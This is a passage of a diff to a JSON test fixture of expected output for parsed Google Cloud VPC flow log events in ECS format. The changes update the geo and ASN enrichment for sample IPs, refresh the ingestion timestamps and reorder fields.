"event", "start": "2019-06-14T03:43:20.700692281Z", 
@@ -24003,6 +25144,18 @@ "id": "1gq7q7afe373f9", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:PZTJxnZbum9ENBi23DLcdTxQuaQ=", + "bytes": 1458, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "inbound" } }, { @@ -24017,11 +25170,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 9200, 
@@ -24093,7 +25251,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392518300Z", + "ingested": "2021-12-14T14:43:27.415299124Z", "original": "{\"insertId\":\"1gq7q7afe373f1\",\"jsonPayload\":{\"bytes_sent\":\"231764\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33694,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565311154Z\",\"packets_sent\":\"251\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:05.566359759Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:05.566359759Z", 
@@ -24104,43 +25262,6 @@ } }, { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, - "destination": { - "geo": { - "continent_name": "America", - "country_name": "usa", - "city_name": "Broomfield", - "region_name": "Colorado" - }, - "as": { - "number": 33652 - }, - "address": "67.43.156.13", - "port": 65276, - "ip": "67.43.156.13" - }, - "source": { - "address": "10.139.99.242", - "port": 9200, - "bytes": 107878, - "packets": 614, - "domain": "elasticsearch", - "ip": "10.139.99.242" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", - "bytes": 107878, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 614, - "direction": "outbound" - }, "@timestamp": "2019-06-14T03:50:17.763Z", "ecs": { "version": "1.12.0" @@ -24151,6 +25272,9 @@ "67.43.156.13" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", 
@@ -24171,8 +25295,33 @@ } } }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 65276, + "ip": "67.43.156.13" + }, + "source": { + "address": "10.139.99.242", + "port": 9200, + "bytes": 107878, + "packets": 614, + "domain": "elasticsearch", + "ip": "10.139.99.242" + }, "event": { - "ingested": "2021-12-09T13:37:46.392523800Z", + "ingested": "2021-12-14T14:43:27.415299567Z", "original": "{\"insertId\":\"1gq7q7afe373ff\",\"jsonPayload\":{\"bytes_sent\":\"107878\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65276,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220621567Z\",\"packets_sent\":\"614\",\"reporter\":\"SRC\",\"rtt_msec\":\"156\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.760349279Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760349279Z", 
@@ -24180,6 +25329,18 @@ "id": "1gq7q7afe373ff", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:yOQ797bLdJqqOXP0XZt1Vg63dm0=", + "bytes": 107878, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 614, + "direction": "outbound" } }, { @@ -24194,11 +25355,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 52430, 
@@ -24270,7 +25436,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392528Z", + "ingested": "2021-12-14T14:43:27.415300060Z", "original": "{\"insertId\":\"1gq7q7afe373fq\",\"jsonPayload\":{\"bytes_sent\":\"595838\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":52430},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:53.081386115Z\",\"packets_sent\":\"299\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"zeek-nsm\",\"zone\":\"us-central1-a\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:07.968717244Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.76361854Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.76361854Z\"}", "kind": "event", "start": "2019-06-14T03:40:07.968717244Z", 
@@ -24281,16 +25447,51 @@ } }, { + "@timestamp": "2019-06-14T03:50:19.219Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "10.87.40.76", + "67.43.156.14" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 37 + } + }, + "source": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + } + }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.14", "port": 56410, 
@@ -24304,6 +25505,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415300446Z", + "original": "{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:47:10.514594429Z", + "end": "2019-06-14T03:47:10.630345069Z", + "id": "14iipwlfd8t01n", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24315,7 +25526,9 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" @@ -24323,14 +25536,17 @@ "related": { "ip": [ "10.87.40.76", - "67.43.156.14" + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "vpcflow": { "reporter": "SRC", "rtt": { - "ms": 37 + "ms": 36 } }, "source": { 
@@ -24346,21 +25562,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392532700Z", - "original": "{\"insertId\":\"14iipwlfd8t01n\",\"jsonPayload\":{\"bytes_sent\":\"1780\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":56410,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:47:10.630345069Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"37\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:47:10.514594429Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:47:10.514594429Z", - "end": "2019-06-14T03:47:10.630345069Z", - "id": "14iipwlfd8t01n", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", 
@@ -24381,50 +25582,8 @@ "domain": "kibana", "ip": "10.87.40.76" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", - "bytes": 1781, - "transport": "tcp", - "type": "ipv4", - "iana_number": "6", - "packets": 7, - "direction": "outbound" - }, - "@timestamp": "2019-06-14T03:50:19.219Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "10.87.40.76", - "192.168.2.117" - ] - }, - "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { - "vpc": { - "project_id": "my-sample-project", - "subnetwork_name": "default", - "vpc_name": "default" - }, - "instance": { - "region": "us-east1", - "project_id": "my-sample-project", - "zone": "us-east1-b" - } - } - }, "event": { - "ingested": "2021-12-09T13:37:46.392537700Z", + "ingested": "2021-12-14T14:43:27.415300837Z", "original": "{\"insertId\":\"14iipwlfd8t01j\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51950,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": 
"2019-06-14T03:41:50.645030007Z", @@ -24432,6 +25591,18 @@ "id": "14iipwlfd8t01j", "category": "network", "type": "connection" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "community_id": "1:jcjE3OEEgs/JCmhTXaJJ97LHMMA=", + "bytes": 1781, + "transport": "tcp", + "type": "ipv4", + "iana_number": "6", + "packets": 7, + "direction": "outbound" } }, { @@ -24440,11 +25611,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 33876, 
@@ -24522,7 +25698,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:46.392542600Z", + "ingested": "2021-12-14T14:43:27.415301226Z", "original": "{\"insertId\":\"14iipwlfd8t01o\",\"jsonPayload\":{\"bytes_sent\":\"361966\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33876,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"80\",\"reporter\":\"SRC\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466868771Z", 
@@ -24533,9 +25709,39 @@ } }, { + "@timestamp": "2019-06-14T03:50:19.219Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.2.117", + "10.87.40.76" + ] + }, "log": { "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" }, + "gcp": { + "destination": { + "vpc": { + "project_id": "my-sample-project", + "subnetwork_name": "default", + "vpc_name": "default" + }, + "instance": { + "region": "us-east1", + "project_id": "my-sample-project", + "zone": "us-east1-b" + } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } + } + }, "destination": { "address": "10.87.40.76", "port": 5601, 
@@ -24556,6 +25762,16 @@ "ip": "192.168.2.117", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415301611Z", + "original": "{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:50.645030007Z", + "end": "2019-06-14T03:41:50.757658840Z", + "id": "14iipwlfd8t01p", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24567,19 +25783,30 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "192.168.2.117", - "10.87.40.76" + "10.87.40.76", + "192.168.2.117" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "destination": { + "vpcflow": { + "reporter": "SRC", + "rtt": { + "ms": 36 + } + }, + "source": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -24590,29 +25817,8 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } - }, - "vpcflow": { - "reporter": "DEST", - "rtt": { - "ms": 36 - } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392546400Z", - "original": "{\"insertId\":\"14iipwlfd8t01p\",\"jsonPayload\":{\"bytes_sent\":\"1457\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"192.168.2.117\",\"src_port\":51950},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:50.757658840Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:50.645030007Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:50.645030007Z", - "end": "2019-06-14T03:41:50.757658840Z", - "id": "14iipwlfd8t01p", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "geo": { "continent_name": "America", 
@@ -24633,6 +25839,16 @@ "domain": "kibana", "ip": "10.87.40.76" }, + "event": { + "ingested": "2021-12-14T14:43:27.415302045Z", + "original": "{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:49:50.733935895Z", + "end": "2019-06-14T03:49:50.856250208Z", + "id": "14iipwlfd8t01e", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24644,25 +25860,24 @@ "iana_number": "6", "packets": 7, "direction": "outbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "10.87.40.76", - "192.168.2.117" + "67.43.156.13", + "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { - "vpcflow": { - "reporter": "SRC", - "rtt": { - "ms": 36 - } - }, - "source": { + "destination": { "vpc": { "project_id": "my-sample-project", "subnetwork_name": "default", 
@@ -24673,23 +25888,14 @@ "project_id": "my-sample-project", "zone": "us-east1-b" } + }, + "vpcflow": { + "reporter": "DEST", + "rtt": { + "ms": 36 + } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392550800Z", - "original": "{\"insertId\":\"14iipwlfd8t01e\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58658,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:50.856250208Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:50.733935895Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:49:50.733935895Z", - "end": "2019-06-14T03:49:50.856250208Z", - "id": "14iipwlfd8t01e", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, @@ -24698,11 +25904,16 @@ }, "source": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" }, "as": { - "number": 15169 + "number": 35908 }, "address": "67.43.156.13", "port": 59924, 
@@ -24710,6 +25921,16 @@ "ip": "67.43.156.13", "packets": 7 }, + "event": { + "ingested": "2021-12-14T14:43:27.415302523Z", + "original": "{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "kind": "event", + "start": "2019-06-14T03:41:08.092659117Z", + "end": "2019-06-14T03:41:08.213471928Z", + "id": "14iipwlfd8t01q", + "category": "network", + "type": "connection" + }, "tags": [ "preserve_original_event" ], @@ -24721,17 +25942,22 @@ "iana_number": "6", "packets": 7, "direction": "inbound" - }, + } + }, + { "@timestamp": "2019-06-14T03:50:19.219Z", "ecs": { "version": "1.12.0" }, "related": { "ip": [ - "67.43.156.13", + "192.168.2.117", "10.87.40.76" ] }, + "log": { + "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" + }, "gcp": { "destination": { "vpc": { 
@@ -24752,21 +25978,6 @@ } } }, - "event": { - "ingested": "2021-12-09T13:37:46.392556300Z", - "original": "{\"insertId\":\"14iipwlfd8t01q\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":59924},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:41:08.213471928Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:41:08.092659117Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", - "kind": "event", - "start": "2019-06-14T03:41:08.092659117Z", - "end": "2019-06-14T03:41:08.213471928Z", - "id": "14iipwlfd8t01q", - "category": "network", - "type": "connection" - } - }, - { - "log": { - "logger": "projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows" - }, "destination": { "address": "10.87.40.76", "port": 5601, 
